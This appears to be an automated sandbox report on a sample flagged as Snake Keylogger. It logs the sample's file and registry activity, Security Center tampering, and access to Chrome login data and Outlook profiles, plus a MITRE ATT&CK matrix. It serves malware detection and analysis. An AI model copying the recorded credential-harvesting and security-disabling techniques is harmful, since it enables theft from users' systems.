                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeQueries volume information: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe VolumeInformation
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeQueries volume information: C:\Users\user\Desktop\lfQuSBwdSf.exe VolumeInformation
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeQueries volume information: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe VolumeInformation
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Lowering of HIPS / PFW / Operating System Security Settings:

                      barindex
                      Changes security center settings (notifications, updates, antivirus, firewall)Show sources
                      Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA &apos;AntiVirusProduct&apos; OR TargetInstance ISA &apos;FirewallProduct&apos; OR TargetInstance ISA &apos;AntiSpywareProduct&apos;
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected Snake KeyloggerShow sources
                      Source: Yara matchFile source: 00000015.00000002.485923538.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000017.00000002.541864387.0000000004A72000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.517681508.0000000004965000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 23.2.svchost.exe.4a72390.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.2.svchost.exe.4ad53b0.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.2.svchost.exe.4ad53b0.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.svchost.exe.49c8f18.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.svchost.exe.4965ef8.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 21.2.lfQuSBwdSf.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.svchost.exe.4965ef8.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.2.svchost.exe.4a72390.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.svchost.exe.49c8f18.2.raw.unpack, type: UNPACKEDPE
                      Tries to harvest and steal browser information (history, passwords, etc)Show sources
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Tries to steal Mail credentials (via file access)Show sources
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

                      Remote Access Functionality:

                      barindex
                      Yara detected Snake KeyloggerShow sources
                      Source: Yara matchFile source: 00000015.00000002.485923538.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000017.00000002.541864387.0000000004A72000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.517681508.0000000004965000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 23.2.svchost.exe.4a72390.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.2.svchost.exe.4ad53b0.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.2.svchost.exe.4ad53b0.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.svchost.exe.49c8f18.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.svchost.exe.4965ef8.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 21.2.lfQuSBwdSf.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.svchost.exe.4965ef8.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.2.svchost.exe.4a72390.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.svchost.exe.49c8f18.2.raw.unpack, type: UNPACKEDPE

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation1DLL Side-Loading1DLL Side-Loading1Disable or Modify Tools21OS Credential Dumping1File and Directory Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsScheduled Task/JobRegistry Run Keys / Startup Folder11Process Injection111Obfuscated Files or Information1LSASS MemorySystem Information Discovery23Remote Desktop ProtocolData from Local System1Exfiltration Over BluetoothEncrypted Channel12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Registry Run Keys / Startup Folder11Software Packing1Security Account ManagerQuery Registry1SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Timestomp1NTDSSecurity Software Discovery241Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDLL Side-Loading1LSA SecretsProcess Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonMasquerading221Cached Domain CredentialsVirtualization/Sandbox Evasion251VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsVirtualization/Sandbox Evasion251DCSyncApplication Window Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobProcess Injection111Proc FilesystemRemote System Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowSystem Network Configuration Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
